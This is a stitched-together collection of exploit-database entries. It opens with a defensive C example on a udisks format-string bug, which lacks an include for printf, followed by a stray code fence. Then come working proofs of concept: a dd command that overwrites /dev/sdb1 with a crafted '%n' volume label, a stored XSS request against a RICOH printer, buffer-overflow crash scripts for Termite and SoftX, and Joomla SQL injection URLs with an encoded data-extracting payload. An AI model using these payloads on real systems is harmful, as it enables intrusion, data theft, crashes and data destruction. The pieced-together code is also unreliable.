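#include <string.h>
#include <stddef.h>

/*
 * Added example, not code from the advisory or from udisks itself.
 *
 * In the GLib >= 2.50 branch quoted in the advisory, `message` (which can
 * carry a volume label) is handed to g_log_structured() as the MESSAGE
 * field, where it is treated as a printf-style format. The defence is a
 * fixed literal format with the untrusted text passed as an argument. The
 * functions below are hypothetical stand-ins built on snprintf so they run
 * without GLib.
 */

/* Count conversion directives ('%' not followed by '%') in untrusted
 * text. A non-zero count is a strong signal that a label is being crafted
 * for a format-string bug; a zero count still does not make it safe to
 * use the text as a format. */
size_t count_format_directives(const char *text)
{
    size_t count = 0;
    for (const char *p = text; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {  /* "%%" is just a literal percent sign */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

/* Hardened logger: the label is an argument to a fixed format, never the
 * format itself, so "%n" inside it is copied, not executed. Returns the
 * snprintf result (characters that would have been written, or -1). */
int log_mount_event(char *out, size_t outlen, int tid, const char *label)
{
    return snprintf(out, outlen, "[%d]: mounted volume with label %s", tid, label);
}

/* Returns 1 if the label appears verbatim in the formatted log line,
 * i.e. its directives were treated as data, 0 otherwise. */
int label_logged_literally(const char *label)
{
    char line[256];
    int n = log_mount_event(line, sizeof line, 4242, label);
    if (n < 0 || (size_t)n >= sizeof line)
        return 0;                     /* encoding error or truncated */
    return strstr(line, label) != NULL;
}

int main(void)
{
    /* Constructed sample: a label like the one the PoC writes to the media. */
    const char *label = "%n%n%n%n";
    char line[256];

    printf("format directives in label: %zu\n", count_format_directives(label));
    if (log_mount_event(line, sizeof line, 4242, label) >= 0)
        printf("%s\n", line);
    return 0;
}
```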

# =============Proof of Concept Code================
# This code will destroy any information on /dev/sdb1!!!!  Change that to where you have your USB media.
# PoC source code:

genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1

# Now remove and reinsert the media and wait for the crash report.
            
# Exploit Title: RICOH Aficio MP 301 Printer - Cross-Site Scripting
# Date: 2018-09-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-301spf-black-and-white-laser-multifunction-printer/_/R-416185
# Software: RICOH Printer
# Product Version:  Aficio MP 301
# Vulnerability Type: Code Injection
# Vulnerability: HTML Injection and Stored XSS
# CVE: N/A

# On the RICOH Aficio MP 301 printer, HTML Injection and Stored XSS vulnerabilities have been 
# discovered in the area of adding addresses via the entryNameIn parameter 
# to /web/entry/en/address/adrsSetUserWizard.cgi.

# HTTP POST Request :

POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: 138.100.78.33
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/plain, */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://138.100.78.33/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 192
Cookie: risessionid=082172179372966; cookieOnOffChecker=on; wimsesid=163487735
Connection: close

mode=ADDUSER&step=BASE&wimToken=507435387&entryIndexIn=00038&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
            
# Exploit Title: Termite 3.4 - Denial of Service (PoC)
# Author: Abdullah Alıç
# Discovery Date: 2018-09-23
# Vendor notified : 2018-09-24
# Homepage: https://www.compuphase.com
# Software Link: https://www.compuphase.com/software_termite.htm
# Tested Version: 3.4
# Tested on OS: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script; it will create a new
# file with the name "boom.txt". Copy the content of the new file "boom.txt". 
# Start the Termite 3.4 terminal, click "Settings", paste the content into the field "User interface language" and click "OK". 
  
#!/usr/bin/python

# Build a 2000-byte payload and write it to boom.txt.
buffer = "A" * 2000

payload = buffer
try:
    with open("boom.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except IOError as e:
    print("File cannot be created: %s" % e)
            
# Exploit Title: Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/micro-deal-factory/
# Version: 2.4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
http://localhost/[PATH]/index.php?option=com_microdealfactory&task=dealdetail&id=[SQL]
http://localhost/[PATH]/my-deals/mydeals/catid,15[SQL]/other
http://localhost/[PATH]/component/microdealfactory/listdeals/userid,44[SQL]/user01
            
# Exploit Title: Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/auction-factory/
# Version: 4.5.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:  
# 1)
# http://localhost/[PATH]/index.php?option=com_auctionfactory&task=listauctions&filter_order_Dir=[SQL]&filter_order=[SQL]

%2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
            
# Exploit Title: SoftX FTP Client 3.3 - Denial of Service (PoC)
# Discovery by: Cemal Cihad ÇİFTÇİ
# Discovery Date: 2018-09-24
# Tested Version: 3.3
# Vulnerability Type: DOS
# Tested on OS: Windows XP Professional Service Pack 3
# Vendor Homepage: www.softx.org
# Download Link: http://www.softx.org/ftp.html

# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "boom.txt". Copy the content of the new file "boom.txt".
# Now start the program. Now when you are inside of the program's Site
# Manager window click "New" > "New Site". In the field: "Site Label" paste
# the copied content from "boom.txt".
# Now click "OK" and see a crash!

#!/usr/bin/python

# Build a 2500-byte payload and write it to boom.txt.
buffer = "A" * 2500

payload = buffer
try:
    with open("boom.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except IOError as e:
    print("File cannot be created: %s" % e)